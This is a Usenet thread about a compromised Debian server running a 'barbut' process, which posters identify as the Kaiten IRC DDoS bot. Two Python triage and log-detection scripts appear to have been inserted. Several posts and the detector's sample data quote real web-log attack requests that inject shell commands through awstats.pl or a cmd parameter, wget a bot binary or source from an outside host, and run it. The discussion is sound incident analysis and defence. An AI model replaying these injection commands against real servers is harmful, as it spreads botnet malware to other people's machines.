barbut process using 100% cpu and connecting
on 16.07.2007 11:42:44 by krzysiek
Hello all!
I've already tried to find an answer by searching Usenet, but with no results.
My problem is: I have my Debian 3.1 Sarge Linux running as a 24/7 router/server
etc.
One day I found some strange activity.
There was a process called "barbut" (2 of them) using 49,2% CPU time each :O
Meanwhile netstat showed established connections to 195.73.177.146:666 + several waiting.
I have no idea where this process came from. Any clues?
This is what ps -A printed:
serwer:~# ps -A
PID TTY TIME CMD
1 ? 00:00:02 init
2 ? 00:00:00 keventd
3 ? 00:00:00 ksoftirqd_CPU0
4 ? 00:00:00 kswapd
5 ? 00:00:00 bdflush
6 ? 00:00:00 kupdated
99 ? 00:00:01 kjournald
295 ? 00:00:00 kcopyd
297 ? 00:00:00 kmirrord
498 ? 00:00:00 khubd
1267 ? 00:00:04 dhclient
1801 ? 00:00:01 syslogd
1807 ? 00:00:00 klogd
1851 ? 00:00:00 postmaster
1856 ? 00:00:00 postmaster
1857 ? 00:00:00 postmaster
1883 ? 00:00:00 courierlogger
1884 ? 00:00:00 authdaemond
1898 ? 00:00:00 authdaemond
1899 ? 00:00:00 authdaemond
1900 ? 00:00:00 authdaemond
1901 ? 00:00:00 authdaemond
1902 ? 00:00:00 authdaemond
1906 ? 00:00:00 cupsd
1916 ? 00:00:00 dhcpd
1948 ? 00:00:00 mysqld_safe
1985 ? 00:00:00 mysqld
1986 ? 00:00:00 logger
1987 ? 00:00:00 mysqld
1988 ? 00:00:00 mysqld
1989 ? 00:00:00 mysqld
1990 ? 00:00:00 mysqld
1991 ? 00:00:00 mysqld
2002 ? 00:00:00 mysqld
2003 ? 00:00:00 mysqld
2004 ? 00:00:00 mysqld
2005 ? 00:00:00 mysqld
2008 ? 00:00:00 mysqld
2046 ? 00:00:00 inetd
2112 ? 00:00:00 master
2121 ? 00:00:00 qmgr
2122 ? 00:00:02 nmbd
2123 ? 00:00:00 nmbd
2125 ? 00:00:00 smbd
2138 ? 00:00:00 smbd
2141 ? 00:00:00 sshd
2209 ? 00:00:00 ntpd
2228 ? 00:00:00 atd
2235 ? 00:00:00 cron
2256 ? 00:00:00 apache-ssl
2312 tty1 00:00:00 getty
2313 tty2 00:00:00 getty
2314 tty3 00:00:00 getty
2315 tty4 00:00:00 getty
2316 tty5 00:00:00 getty
2317 tty6 00:00:00 getty
14285 ? 00:00:00 gcache
14289 ? 00:00:00 apache-ssl
14290 ? 00:00:00 apache-ssl
14291 ? 00:00:00 apache-ssl
14292 ? 00:00:00 apache-ssl
14293 ? 00:00:00 apache-ssl
14302 ? 00:00:02 apache2
14327 ? 00:00:00 apache2
14328 ? 00:00:00 apache2
14329 ? 00:00:00 apache2
14330 ? 00:00:00 apache2
14331 ? 00:00:00 apache2
14798 ? 00:00:00 apache2
16306 ? 00:00:00 apache2
16381 ? 00:00:00 apache2
16382 ? 00:00:00 apache2
16383 ? 00:00:00 apache2
21869 ? 00:00:00 pickup
22055 ? 00:00:00 sshd
22059 pts/0 00:00:00 bash
22259 ? 00:00:00 sshd
22263 ? 00:00:00 sshd
22272 ? 00:00:00 barbut
22276 pts/0 00:00:00 ps
Any strange processes? Or something I should look for?
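The symptom in this first post (an unfamiliar process name burning CPU while holding connections to a remote port) is the kind of thing a short triage script can surface before anyone touches the binary. The following is an added example, not code posted in this thread: it parses the output formats of `ps -eo pid,pcpu,comm` and `netstat -tnp` (both real commands) and flags processes that are hot on CPU or hold TCP connections under a name that is not in an operator-defined baseline. The sample command output and the baseline set are constructed to mirror the host described above; adjust the baseline per host.

```python
"""Correlate process CPU share with established TCP connections.

Added triage helper, not from this thread. Parses the output of
`ps -eo pid,pcpu,comm` and `netstat -tnp`; the sample text below is
constructed to mirror the thread (two 'barbut' processes at ~49% CPU
talking to 195.73.177.146:666).
"""
import re
from collections import defaultdict

# Daemons the operator expects to hold TCP sockets on this host
# (constructed baseline for the router in the thread; tune per host).
KNOWN_NETWORK_DAEMONS = {
    "sshd", "apache2", "apache-ssl", "mysqld", "postmaster",
    "smbd", "nmbd", "ntpd", "master",
}

CPU_THRESHOLD = 40.0  # percent; anything hotter on an idle router merits a look

# Constructed sample of `ps -eo pid,pcpu,comm` output.
PS_SAMPLE = """\
  PID %CPU COMMAND
    1  0.0 init
 2141  0.0 sshd
22055  0.0 sshd
22272 49.2 barbut
22273 49.2 barbut
22276  0.0 ps
"""

# Constructed sample of `netstat -tnp` output (needs root to show other
# users' PIDs).
NETSTAT_SAMPLE = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.1.1:22          192.168.1.50:51234      ESTABLISHED 22055/sshd
tcp        0      0 192.168.1.1:33021       195.73.177.146:666      ESTABLISHED 22272/barbut
tcp        0      0 192.168.1.1:33022       195.73.177.146:666      SYN_SENT    22273/barbut
tcp        0      0 192.168.1.1:33023       195.73.177.146:666      ESTABLISHED 22273/barbut
"""

NETSTAT_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)/(\S+)"
)


def parse_ps(text):
    """Map pid -> (cpu_percent, command) from `ps -eo pid,pcpu,comm` output."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) == 3:
            pid, cpu, comm = parts
            procs[int(pid)] = (float(cpu), comm)
    return procs


def parse_netstat(text):
    """Map pid -> [(foreign_addr, state), ...] from `netstat -tnp` output."""
    conns = defaultdict(list)
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            _local, foreign, state, pid, _prog = m.groups()
            conns[int(pid)].append((foreign, state))
    return conns


def triage(ps_text, netstat_text, known=KNOWN_NETWORK_DAEMONS,
           cpu_threshold=CPU_THRESHOLD):
    """Return one finding per process that is hot on CPU or holds TCP
    connections under a name outside the expected baseline."""
    procs = parse_ps(ps_text)
    conns = parse_netstat(netstat_text)
    findings = []
    for pid, (cpu, comm) in sorted(procs.items()):
        reasons = []
        if cpu >= cpu_threshold:
            reasons.append(f"cpu {cpu:.1f}%")
        if pid in conns and comm not in known:
            peers = sorted({foreign for foreign, _ in conns[pid]})
            reasons.append("unexpected network peer(s): " + ", ".join(peers))
        if reasons:
            findings.append({"pid": pid, "comm": comm, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(PS_SAMPLE, NETSTAT_SAMPLE):
        print(f"pid {f['pid']:>6} {f['comm']:<10} " + "; ".join(f["reasons"]))
```

On a live host, feed the script the real output of the two commands instead of the constructed samples. The `pcpu` column is what the 49,2% figure above corresponds to; `ps -A` by itself prints only accumulated TIME, which is why barbut shows 00:00:00 there despite the load.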
Re: barbut process using 100% cpu and connecting
on 16.07.2007 20:15:46 by Jens Hoffmann
Hi,
krzysiek wrote:
> there was a process called "barbut" (2 of them) using 49,2% CPU time
> each :O
Have you installed such a program? Where is it installed? What kind of
files are around that place?
> meanwhile netstat showed established connections to 195.73.177.146:666
> + several waiting.
Some host in .nl.
> I have no idea where did this process come from. Any clues?
I don't know about you, but I would take the machine off the net and
try to understand what happened.
After that, reinstall without the hole.
Cheers,
Jens
Re: barbut process using 100% cpu and connecting
on 19.11.2007 10:03:01 by Lord Brett Sinclair
A long gap since this post, but I've just noticed "barbut" in our web
server logs, googled, and found nothing but this query:
On Jul 16, 6:15pm Jens Hoffmann wrote:
> krzysiek wrote:
> > there was a process called "barbut" (2 of them) using 49,2% CPU time
> > each :O
> > meanwhile netstat showed established connections to 195.73.177.146:666
> > + several waiting.
> Some host in .nl.
> > I have no idea where did this process come from. Any clues?
> I don't know about you, but I would take the machine off the net and
> try to understand what happened.
I hope the original poster did that - here's the "barbut" occurrence in
our apache log:
GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/ barbut;chmod%20755%20barbut;./barbut;
echo| HTTP/1.1
(there are four attempts, trying different paths to awstats.pl)
I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as
'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)
Googling for some of those names finds this is probably the source code:
http://packetstormsecurity.nl/irc/kaiten.c
The comments start:
"This is a IRC based distributed denial of service client. It connects
to the server specified below and accepts commands via the channel
specified."
Hope this was useful,
A.
Re: barbut process using 100% cpu and connecting
on 20.11.2007 08:46:59 by ale2007
On 19 Nov, 10:03, "A" wrote:
> Googling for some of those names finds this is probably the source code:
>
> http://packetstormsecurity.nl/irc/kaiten.c
I've found similar requests in yesterday's log (19/Nov/2007:20:02:53 +0100)
"GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
barbut ; HTTP/1.1"
W.r.t. the sources mentioned above, barbut.c has been changed,
including the following differences:
* The CHAN (channel to join) changed from "#whatever" to "#whatever1"
* The server list has been replaced by the single entry
"217.79.176.126"
* The initial connection has changed from port 6667 to port 113
* The "run command" macro has changed from "SH " to "ZK "
* The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
%s +iwx"
That apparently didn't succeed, so I don't know who the victims are...
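Both log excerpts in this thread (the awstats.pl configdir injection in A.'s post and the bare cmd= form quoted here) share one shape: a query parameter whose decoded value is a shell pipeline that fetches, builds or runs a binary. The following detector is an added example, not code from the thread: it parses combined-format Apache access lines, URL-decodes each query parameter, and flags values that contain both a shell metacharacter and one of the tool names those pipelines rely on. The log lines are constructed for the example; the two injection requests reproduce the strings quoted in the thread, while the client addresses and the benign lines are made up.

```python
"""Flag shell-command injection attempts in Apache access logs.

Added example, not code from this thread. It looks for the request shape
both posters quoted: a query parameter whose decoded value is a shell
pipeline that downloads and runs something.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Combined log format. The request target is matched non-greedily because
# the attack requests quoted in the thread contain raw, unencoded spaces.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<request>.*?) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A value counts as shell-like only if it has BOTH a command separator and a
# tool used to fetch, build or run a payload; requiring both keeps ordinary
# search strings with a stray '|' out of the findings.
META_RE = re.compile(r"[;|`]|\$\(")
TOOL_RE = re.compile(
    r"(?:^|[;|&\s(])(?:wget|curl|chmod|gcc|killall|perl|sh|bash|nc)\b"
)

# Constructed sample: lines 2 and 3 carry the two requests quoted in the
# thread; client addresses and the benign lines are made up.
SAMPLE_LOG = [
    '10.0.0.7 - - [19/Nov/2007:20:01:10 +0100] "GET /cgi-bin/awstats.pl'
    '?config=example.org&month=11&year=2007 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [19/Nov/2007:20:02:40 +0100] "GET /awstats.pl?configdir=|echo;'
    'cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo|'
    ' HTTP/1.1" 404 289 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [19/Nov/2007:20:02:53 +0100] "GET ?=?&cmd=cd /tmp;killall -9 '
    'barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;'
    'gcc barbut.c -o barbut;./barbut ; HTTP/1.1" 400 301 "-" "-"',
    '10.0.0.11 - - [19/Nov/2007:20:05:00 +0100] "GET /search?q=fresh+fish+recipes'
    ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def looks_like_shell(value):
    """True when a decoded parameter value reads as a shell pipeline."""
    return bool(META_RE.search(value) and TOOL_RE.search(value))


def suspicious_params(target):
    """Return {param_name: decoded_value} for shell-looking query parameters
    of one request target (path plus query string)."""
    query = urlsplit(target).query
    hits = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote_plus(value)
        if looks_like_shell(value):
            hits[unquote_plus(name) or "(empty)"] = value
    return hits


def scan_log(lines):
    """Return one finding per log line whose request carries a shell-looking
    parameter: client, timestamp, path, HTTP status and the decoded values."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        target = m.group("request")
        hits = suspicious_params(target)
        if hits:
            findings.append({
                "client": m.group("client"),
                "ts": m.group("ts"),
                "path": urlsplit(target).path,
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} {f['path'] or '(no path)'} "
              f"status={f['status']}")
        for name, value in f["params"].items():
            print(f"    {name} = {value}")
```

The HTTP status in each finding is worth keeping: a 404 or 400 on the injection request says the target script was absent or the request malformed, whereas a 200 against a real awstats.pl is the case that warrants the host triage described earlier in the thread. The tool list is a heuristic and should be tuned to the site; the two-condition rule trades some recall for far fewer false positives on search parameters.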
Re: barbut process using 100% cpu and connecting
on 21.11.2007 21:02:09 by Peder.Rovelstad
On Nov 20, 1:46 am, ale2007 wrote:
> On 19 Nov, 10:03, "A" wrote:
>
> > Googling for some of those names finds this is probably the source code:
>
> > http://packetstormsecurity.nl/irc/kaiten.c
>
> I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
> +0100)
> "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
> barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
> barbut ; HTTP/1.1"
>
> W.r.t. the sources mentioned above, barbut.c has been changed,
> including the following differences:
>
> * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
> * The server list has been replaced by the single entry
> "217.79.176.126"
> * The initial connection was has changed from port 6667 to port 113
> * The "run command" macro has changed from "SH " to "ZK "
> * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
> %s +iwx"
>
> That didn't apparently succeed, so I don't know who are the victims...
I found the same connection to my Imail server and Sophos posted this
a few minutes ago.
http://www.sophos.com/security/analyses/trojkaitenw.html